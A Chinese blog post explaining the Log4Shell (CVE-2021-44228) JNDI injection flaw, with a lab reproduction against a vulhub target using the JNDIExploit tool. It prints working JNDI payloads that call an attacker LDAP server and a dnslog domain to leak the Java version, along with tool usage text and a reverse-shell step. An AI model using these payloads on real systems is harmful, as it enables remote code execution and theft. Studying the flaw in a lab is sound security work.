Apache Log4j2 Jndi RCE CVE-2021-44228漏洞原理讲解

已于 2024-04-10 20:38:01 修改
阅读量1.3k 收藏 18
点赞数 14
分类专栏: Web安全进阶 文章标签: apache log4j
于 2024-04-06 17:40:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/137429820
版权

Apache Log4j2 Jndi RCE CVE-2021-44228漏洞原理讲解

在这里插入图片描述

一、什么是Log4j2

  • Log4j2(Log for java)是Apache软件基金会下一个优秀java程序日志监控组件

  • Log4j2远程代码执行漏洞细节被公开【影响版本Log4j 2.x <= 2.15.0-rc1】

  • 影响:多达60644个开源软件,涉及相关版本软件包更是达到了321094个

  • 特征:恶意请求中包含 JNDI 协议地址,如ldap://rmi://等,被 log4j2 解析为 JNDI 查找

  • 原理:在日志输出中,未对字符进行严格的过滤,执行了 JNDI 协议加载的远程恶意脚本,从而造成远程代码执行

  • 攻击字段:

    • ${jndi:ldap://${sys:java.version}.7fprj5.dnslog.cn}(手动测试)
    • ${jndi:ldap://192.168.249.128:1389/h8sgrk}(工具生成)
    • (一般 payload 我们需要进行 URL 编码,传入的命令也需要进行 base64 编码后再解码)

  • 修复:

    • 将 Log4j 升级到已修复漏洞的版本
    • 如果不需要使用 JndiLookup 插件,可以将其移除或禁用
    • 配置 log4j2.xml 来限制日志文件的输出路径

二、环境搭建

  1. 使用Intellij IDEA创建项目
    在这里插入图片描述
    在这里插入图片描述

  2. pom.xml中添加依赖
    在这里插入图片描述

  3. 点击刷新
    在这里插入图片描述

  4. 获得log4j的源码
    在这里插入图片描述

三、简单使用Log4j2

在这里插入图片描述

  • ALL <DEBUG < INFO < WARN < ERROR < FATAL <OFF (只有等级>=设置的等级才会输出日志【ERROR、FATAL】)

  1. 输出错误日志
    在这里插入图片描述

  2. Log4j2提供了lookup功能
    在这里插入图片描述

四、JDNI和RMI

  • 什么是JDNI?
    • JNDI(Java Naming and Directory Interface)本质是可以操作目录服务、域名服务的一组接口
    • JNDI可访问的现有的目录及服务有:JDBC、LDAPRMI、DNS、NIS、CORBA。
  • 什么RMI?
    • RMl:远程方法调用(Remote Method Invoke)
    • 客户端(Client)可以远程调用服务端(Server)上的方法,JVM虚拟机能够远程调用另一个JVM虚拟机中的方法

4.1、启动一个RMI服务端

在这里插入图片描述

  1. 服务端:
    在这里插入图片描述
  2. 服务端的资源:
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
  3. 使用python开启本地的一个web服务
    在这里插入图片描述
    在这里插入图片描述
  4. 启动RMI服务端:
    在这里插入图片描述

4.2、启动一个RMI客户端

在这里插入图片描述

  1. 创建
    在这里插入图片描述

  2. 运行,发生报错,是因为高版本的java是不支持rmi获取相关的资源,需要添加一些设置才可以
    在这里插入图片描述
    在这里插入图片描述

  3. 重新运行,虽然没有报错,但是依旧没有“启动计算器”,代码不能够执行,需要再添加一条代码
    在这里插入图片描述
    在这里插入图片描述

  4. 再次重新运行:打印了“hello”,并且调出了计算器
    在这里插入图片描述

  5. 利用log4j的lookup的功能,也成功的请求了资源
    在这里插入图片描述
    在这里插入图片描述

4.3、ldap

  • ldap与rmi类似

五、漏洞复现

  1. 靶场地址:https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
  2. 工具:JNDIExploit-1.2-SNAPSHOT.jar:https://github.com/zzwlpx/JNDIExploit
java -jar JNDIExploit.jar -h # 查看参数说明,其中 --ip 参数为必选参数
	-i , --ip 		# Local ip address
	-1 , --ldapPort 	# Ldap bind port(default:1389)
	-p , --httpPort 	# Http bind port(default:8080)
	-u , --usage 		# Show usage (default:false)
	-h , --help 		# Show this help

在这里插入图片描述

  1. 靶场地址:120.77.38.47
    在这里插入图片描述

  2. 将工具放在攻击机上:162.14.83.77
    在这里插入图片描述

  3. 在攻击机上运行工具:162.14.83.77是攻击机的IP地址
    在这里插入图片描述

  4. 查看工具用法
    在这里插入图片描述

  5. 攻击机开启监听
    在这里插入图片描述

  6. 使用反弹shell
    在这里插入图片描述
    在这里插入图片描述

  7. 攻击机监听成功

六、Python批量检测

在这里插入图片描述

月亮今天也很亮
关注
  • 14
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-44228 Log4j 远程代码执行漏洞——原理
m0_61506558的博客
09-05 613
http://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2021-44228 CVE-2021-44228 远程代码执行漏洞 →2.15.0修复 CVE-2021-45046 拒绝服务Dos漏洞 →2.16.0修复 CVE-2021-45105 拒绝服务Dos漏洞 →2.17.0修复 CVE-2021-44832 远程代码执行漏洞 →2.17.1修复
Log4j2JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2661
前言 最近Log4j2JNDI注入漏洞CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
Log4J2漏洞CVE-2021-44228原理
m0_62466350的博客
05-07 2780
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
Log4j2 远程代码执行漏洞CVE-2021-44228
最新发布
qq_68163788的博客
06-18 1261
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
Makboli的博客
08-26 1249
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(四)—漏洞修复原理(2.15.0-RC1、2.15.0、2.16.0)
跳小闹成长记
12-14 3178
本文将和大家一起对Log4j2漏洞进行全面深入的剖析。我们将从如下几个方面进行讲解。 1、Log4j2漏洞的基本原理 2、Log4j2漏洞在Java高低版本中的不同攻击原理 3、Log4j2漏洞在Java高低版本中的攻击步骤 4、Log4j2漏洞在2.15.0-RC1中被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
apache-log4j-2.16.0-bin.rar
12-17
然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228,这个漏洞允许攻击者通过在日志记录中注入恶意代码,实现远程代码执行(RCE),对受影响的系统造成严重威胁。 该漏洞源于Log4j2的一个...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java日志框架Apache Log4j2,可能导致远程代码执行(RCE)的风险,让攻击者有机会完全控制受影响的系统。本文将深入探讨Log4j2漏洞原理、影响范围以及如何进行...
apache-log4j-2.15.0-rc2-bin.zip
12-10
2021年12月初,Log4j 发现了一个严重漏洞,被称为CVE-2021-44228,也称为"Log4Shell"。这是一个非常危险的漏洞,因为它允许攻击者通过注入恶意代码到日志记录字符串中,从而实现远程代码执行。一旦攻击成功,黑客...
log4j-2.15.0-rc2.tar.gz
12-10
然而,在2021年12月初,一个严重的安全漏洞被发现,即CVE-2021-44228,这个漏洞被称为“Log4Shell”,它允许远程代码执行(RCE),对使用Log4j 2.x版本的系统构成了重大威胁。 此漏洞源于Log4j中的JNDI(Java ...
扫描log4j2 版本扫描log4j2 版本
12-16
2021年,Log4j2曝出了一次重大安全事件,被称为"CVE-2021-44228",这个漏洞允许攻击者通过注入特定的JNDI(Java Naming and Directory Interface)链接来执行任意代码。这个漏洞影响了大量使用Log4j2的系统,包括...
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
jndi-1.2.1.jar.zip
03-20
ndi1..2.1所需要的jar,1,。2.1
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 8037
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1860
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
探索 Log4j2 CVE-2021-44228:理解、防范与修复
gitblog_00083的博客
04-18 440
探索 Log4j2 CVE-2021-44228:理解、防范与修复 项目地址:https://gitcode.com/jas502n/Log4j2-CVE-2021-44228 该项目由jas502n在GitCode上发布,主要关注的是Java日志框架Log4j2的重大安全漏洞——CVE-2021-44228。这是一个影响全球众多系统的安全事件,本文将深入解析这个问题,帮助开发者理解和采取必要的防...
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 715
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
log4j2漏洞分析
weixin_47623655的博客
04-11 1326
漏洞标识符为CVE-2021-44228,通常称为Log4Shell或Log4j漏洞,它存在于Log4jJNDI查找功能中。攻击者可以通过特殊构造的请求利用此漏洞,向Log4j发送恶意请求,从而触发远程代码执行(RCE漏洞,进而获得服务器上的完全控制权限。这个漏洞的危害非常大,由于Log4j广泛应用于各种Java应用程序中,这意味着攻击者可以利用该漏洞轻松攻击大量的目标。
复现log4j2漏洞CVE-2021-44228
qq_58000413的博客
09-13 907
接着我们再构造payload action=${jndi:ldap://${sys:java.version}.0tortx.dnslog.cn}cd vulhub/log4j/CVE-2021-44228 进入目录里。docker-compoes up -d 开启环境。docker-compoes ps 查看对应的端口。可以看到端口在8983上,我们到服务器防火墙打开8983。出现java版本,则存在命令执行漏洞
apache log4j CVE-2021-44228漏洞怎么解决
06-03
java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值